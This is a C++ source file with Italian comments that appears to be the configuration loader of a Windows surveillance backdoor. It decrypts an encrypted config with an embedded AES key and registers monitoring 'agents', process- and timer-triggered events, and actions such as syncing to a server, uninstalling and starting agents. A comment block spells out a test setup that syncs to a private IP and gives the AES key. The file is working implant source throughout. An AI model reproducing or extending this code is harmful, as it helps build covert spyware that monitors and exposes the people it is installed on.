#include <exception>
#include "Conf.h"
#include "Status.h"
#include "Encryption.h"

#define STEP_AND_ASSIGN(p, delta, var) 	p += delta; \
										var = *(UINT *)(p);

#define ASSIGN_AND_STEP(p, delta, var) 	var = *(UINT *)(p); \
										p += delta;

#define STEP(p, delta) 	p += delta;

using namespace std;

Conf::Conf() : wConfName(NULL), wEncryptedConfName(NULL), encryptionObj(NULL) {
	UINT len = 0;

	statusObj = Status::self();
	encryptionObj = new(std::nothrow) Encryption(g_AesKey, 128);

	// XXX - I fail delle new dovrebbero lanciare un'eccezione.
	if(encryptionObj == NULL)
		return;

	len = wcslen(g_ConfName);

	wEncryptedConfName = new(std::nothrow) WCHAR[len + 1];

	if(wEncryptedConfName == NULL)
		return;

	memset(wEncryptedConfName, 0x00, (len + 1) * sizeof(WCHAR));
	memcpy(wEncryptedConfName, g_ConfName, len * sizeof(WCHAR));

	wConfName = encryptionObj->DecryptName(wEncryptedConfName, g_AesKey[0]);
}

Conf::~Conf(){
	if(encryptionObj)
		delete encryptionObj;

	if(wConfName)
		free(wConfName);

	if(wEncryptedConfName)
		delete[] wEncryptedConfName;
}

BOOL Conf::ParseAgent(BYTE **pAgent, UINT Num) {
	AgentStruct cfgAgent, *ptr;
	UINT  i;
	BYTE *tmp = NULL;

	memset(&cfgAgent, 0x00, sizeof(AgentStruct));

	// Num = numero di Eventi
	ptr = (pAgentStruct)(*pAgent);
	for(i = 0; i < Num; i++){
		cfgAgent.uAgentId = ptr->uAgentId;
		cfgAgent.uAgentStatus = ptr->uAgentStatus;
		cfgAgent.uParamLength = ptr->uParamLength;
		cfgAgent.pParams = NULL;
		cfgAgent.pFunc = NULL;
		cfgAgent.uCommand = 0;

		if(cfgAgent.uParamLength){
			cfgAgent.pParams = new(std::nothrow) BYTE[cfgAgent.uParamLength];

			if(cfgAgent.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
			memcpy(cfgAgent.pParams, tmp, cfgAgent.uParamLength);
			tmp += cfgAgent.uParamLength; // Puntiamo al prossimo agente/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi tre parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
		}

		ptr = (pAgentStruct)tmp;
		statusObj->AddAgent(&cfgAgent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pAgent) = (BYTE *)ptr;

	return TRUE;
}

// Dopo gli eventi non esiste una sezione "azioni" perche' nel formato di
// naga le azioni seguono subito gli eventi, percio' dobbiamo richiamare
// direttamente la ParseActions() al ritorno da questa funzione...
BOOL Conf::ParseEvent(BYTE **pEvent, UINT Num) {
	EventStruct cfgEvent, *ptr;
	UINT i;
	BYTE *tmp = NULL;

	memset(&cfgEvent, 0x00, sizeof(EventStruct));

	// Len = numero di Eventi
	ptr = (pEventStruct)(*pEvent);
	for(i = 0; i < Num; i++){
		cfgEvent.uEventType = ptr->uEventType;
		cfgEvent.uActionId = ptr->uActionId;
		cfgEvent.uParamLength = ptr->uParamLength;
		cfgEvent.pParams = NULL;
		cfgEvent.pFunc = NULL;
		cfgEvent.uCommand = 0;
		cfgEvent.uEventStatus = EVENT_STOPPED;

		if(cfgEvent.uParamLength){
			cfgEvent.pParams = new(std::nothrow) BYTE[cfgEvent.uParamLength];

			if(cfgEvent.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
			memcpy(cfgEvent.pParams, tmp, cfgEvent.uParamLength);
			tmp += cfgEvent.uParamLength; // Puntiamo al prossimo agente/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi tre parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
		}

		ptr = (pEventStruct)tmp;
		statusObj->AddEvent(&cfgEvent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pEvent) = (BYTE *)ptr;

	return TRUE; // Ora dobbiamo chiamare ParseAction()!!!
}

// Questa funzione passa il puntatore alla struttura che definisce una macro-azione
BOOL Conf::ParseAction(BYTE **pAction, UINT Num) {
	MacroActionStruct cfgAction;
	pActionStruct ptr;
	UINT i, j;
	BYTE *tmp = NULL;

	memset(&cfgAction, 0x00, sizeof(MacroActionStruct));

	// Len = numero di macro-azioni
	for(i = 0; i < Num; i++){
		// Leggi il numero di sotto-azioni per questa macro-azione
		ASSIGN_AND_STEP(*pAction, sizeof(UINT), cfgAction.uSubActions)
		cfgAction.pActions = new(std::nothrow) ActionStruct[cfgAction.uSubActions];

		if(cfgAction.pActions == NULL)
			return FALSE;

		cfgAction.bTriggered = FALSE;
		// Imposta tutte le sotto-azioni
		ptr = (pActionStruct)(*pAction);
		for(j = 0; j < cfgAction.uSubActions; j++){
			cfgAction.pActions[j].uActionType = ptr->uActionType;
			cfgAction.pActions[j].uParamLength = ptr->uParamLength;
			cfgAction.pActions[j].pParams = NULL;

			if(cfgAction.pActions[j].uParamLength){
				cfgAction.pActions[j].pParams = new(std::nothrow) BYTE[cfgAction.pActions[j].uParamLength];

				// XXX - Andrebbe fatto il cleanup se la new fallisce e sono gia' stati allocati
				// degli elementi
				if(cfgAction.pActions[j].pParams == NULL)
					return FALSE;

				// Ci spostiamo sul buffer dati e copiamo la configurazione
				tmp = (BYTE *)ptr;
				tmp += (sizeof(UINT) * 2);
				memcpy(cfgAction.pActions[j].pParams, tmp, cfgAction.pActions[j].uParamLength);
				tmp += cfgAction.pActions[j].uParamLength; // Puntiamo al prossimo agente/sezione/etc...
			}else{
				// Spostiamo avanti il puntatore della grandezza dei primi tre parametri
				// della struttura.
				tmp = (BYTE *)ptr;
				tmp += (sizeof(UINT) * 2);
			}

			ptr = (pActionStruct)tmp;

		}
		(*pAction) = (BYTE *)ptr;

		statusObj->AddAction(&cfgAction);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}

	return TRUE;
}

BOOL Conf::ParseConfiguration(BYTE **pConf, UINT Num) {
	ConfStruct cfgConf, *ptr;
	UINT i;
	BYTE *tmp = NULL;

	memset(&cfgConf, 0x00, sizeof(ConfStruct));

	// Len = numero di Eventi
	ptr = (pConfStruct)(*pConf);
	for(i = 0; i < Num; i++){
		cfgConf.uConfId = ptr->uConfId;
		cfgConf.uParamLength = ptr->uParamLength;
		cfgConf.pParams = NULL;

		if(cfgConf.uParamLength){
			cfgConf.pParams = new(std::nothrow) BYTE[cfgConf.uParamLength];

			if(cfgConf.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 2);
			memcpy(cfgConf.pParams, tmp, cfgConf.uParamLength);
			tmp += cfgConf.uParamLength; // Puntiamo al prossimo evento/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 2);
		}

		ptr = (pConfStruct)tmp;
		statusObj->AddConf(&cfgConf);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pConf) = (BYTE *)ptr;

	return TRUE;
}

/*
La configurazione di test e' cosi' composta:
Eventi:
0 - on process mspaint.exe
1 - on process calc.exe
2 - timer ogni 3 ore

Azioni:
0 - 
0.1 synca su 192.168.100.179

1 - 
1.1 uninstall
1.2 starta un agente

2 -
2.1 uninstall
2.2 synca
2.3 starta un agente


Agenti:
tre attivi

Chiave aes:
37A6259CC0C1DAE299A7866489DFF0BD
*/

// Questa funzione al termine deve liberare il puntatore ai dati decifrati
BOOL Conf::LoadConf() {
#define EXIT_ON_ERROR(x)	if(x == NULL){ delete[] pConf; return FALSE;}
#define CLEAN_AND_EXIT(x)	delete[] pConf; return x;

	BYTE *pConf = NULL, *pTemp = NULL;
	UINT Len = 0, i = 0, num = 0;

	if(wEncryptedConfName == NULL)
		return FALSE;

	pConf = encryptionObj->DecryptConf(wEncryptedConfName, &Len);

	if(pConf == NULL || Len == 0)
		return FALSE;

	// pConf punta alla prima DWORD del blocco (lunghezza del file),
	// ci spostiamo in modo da puntare al primo byte della configurazione
	pTemp = pConf + 4;

	// Leggi la sezione relativa agli agenti
	pTemp = MemStringCmp(pConf, AGENT_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAgent(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	// Leggi la sezione relativa agli eventi e poi le azioni
	pTemp = MemStringCmp(pConf, EVENT_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseEvent(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAction(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	// Leggi i parametri di configurazione
	pTemp = MemStringCmp(pConf, MOBIL_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseConfiguration(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	CLEAN_AND_EXIT(TRUE);
}

// XXX - Da implementare, se mai dovesse servire.
BOOL Conf::WriteConf(pGeneralConf pConf) {
	return FALSE;
}

BOOL Conf::RemoveConf(UINT type) {
	WCHAR *backdoorPath, *completePath = NULL, *delim_ptr;
	UINT delimiter = 0;

	backdoorPath = new(std::nothrow) WCHAR[MAX_PATH];

	if(backdoorPath == NULL)
		return FALSE;

	if(!GetModuleFileName(NULL, backdoorPath, MAX_PATH)){
		delete[] backdoorPath;
		return FALSE;
	}

	delim_ptr = backdoorPath;
	delim_ptr += wcslen(backdoorPath);

	while(*delim_ptr != '\\'){
		delim_ptr--;
		delimiter++;
	}

	completePath = new(std::nothrow) WCHAR[wcslen(backdoorPath) + wcslen(wEncryptedConfName) + 1];

	if(completePath == NULL){
		delete[] backdoorPath;
		delete[] completePath;
		return FALSE;
	}

	memset(completePath, 0x00, sizeof(WCHAR) * wcslen(backdoorPath) + wcslen(wEncryptedConfName) + 1);
	memcpy(completePath, backdoorPath, sizeof(WCHAR) * (wcslen(backdoorPath) - delimiter + 1));
	wcscat_s(completePath, MAX_PATH, wEncryptedConfName);

	BOOL res = DeleteFile(completePath);

	delete[] backdoorPath;
	delete[] completePath;
	
	return res;
}

// XXX - Va implementata! Per il momento scriviamo comunque tutto in maniera
// cifrata e leggiamo solo da file cifrati, per cui questa funzione non serve,
// viene lasciata qui per eventuali utilizzi futuri.
BOOL Conf::FillFile(WCHAR *wName) {
	return TRUE;
}

BYTE* Conf::MemStringCmp(BYTE *memory, CHAR *string, UINT uLen)
{
	BYTE *ptr;
	UINT len = 0;
	ptr = memory;

	for(;;) {
		if (!strcmp((CHAR *)ptr, string))
			return (ptr + strlen(string) + 1);

		ptr++;
		len++;

		if(len > uLen)
			return NULL;
	}
}